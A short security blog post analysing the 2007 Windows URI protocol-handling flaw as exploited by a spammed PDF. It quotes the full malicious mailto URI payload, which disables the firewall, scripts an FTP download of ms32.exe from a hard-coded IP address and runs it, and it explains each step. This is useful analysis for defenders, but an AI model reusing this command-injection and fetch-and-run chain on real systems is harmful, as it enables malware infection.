Windows URI protocol handling vulnerability

This is an interesting vulnerability first got published at the end of July 2007 but really brought to light at the end of October 2007 when spammers exploited this vulnerability by sending a specially crafted
URI (Uniform Resource Identifier) containing a "%" character and ending with a certain extension (e.g. ".bat" or ".cmd").

Internet Explorer 7 on Windows XP or Server 2003 changes the way
Windows handles URIs. This change has introduced a flaw that can cause
Windows to incorrectly determine the appropriate handler for the protocol
specified in a URI.

In other words an input validation error within the handling of URIs
with registered URI handlers.
(e.g. "mailto", "news", "nntp", "snews", "telnet", and "http").

Adobe Reader and Firefox are to name a few which is used as an attack
vector to exploit this vulnerability.

The actual malicious PDF file spammed which was brought to my attention was called "report.pdf" and was only 3,919 bytes in size.

Heres the embedded code which is obvious on what it does:

<</URI(mailto:%/../../../../../../windows/system32/cmd".exe"" /c /q
\"@netsh firewall set opmode mode=disable&@echo o 203.121.69.116>7&@echo binary>>7&@echo get /ms32.exe>>7&@echo quit>>7&@ftp -s:7 -v -A>nul&@del /q 7&@start ms32.exe&\" \"&\" "con.cmd)/S/URI>>


As you can see the remote code execution was beautifully crafted.

Here are the steps it takes:

1. netsh firewall set opmode mode=disable
   - disables the windows firewall.
2. echo o 203.121.69.116>7&@echo binary>>7&@echo get /ms32.exe>>7&@echo quit>>7
   - creates a script which will be used by ftp, script called here is 7
3. ftp -s:7 -v -A>nul
   - runs the script via ftp which downloads the malware called ms32.exe
4. del /q 7
   - deletes the script
5. start ms32.exe
   - finally executes the malware ms32.exe
6. GAMEOVER :)


McAfee AV detects the malware as Exploit-PDF
Sophos AV detects the malware as W32/PDF-URI.L
Symantec AV detects the malware as Bloodhound.Exploit.163

Updates for Adobe and Firefox have been released which mitigate this vulnerability.

 

Microsoft have finally released an update on the 13th of November updating the shell32.dll library which handles the URIs.


References:

http://secunia.com/advisories/26201/
http://www.kb.cert.org/vuls/id/403150/
http://www.us-cert.gov/cas/techalerts/TA07-297B.html
http://www.microsoft.com/technet/security/advisory/943521.mspx
http://vil.nai.com/vil/content/v_139103.htm
http://www.f-secure.com/v-descs/exploit_w32_pdf-uri_l.shtml
http://securityresponse.symantec.com/security_response/ +

writeup.jsp?docid=2007-102318-0451-99&tabid=1

http://www.microsoft.com/technet/security/Bulletin/MS07-061.mspx

[Source: Greyhathacker]

0 comments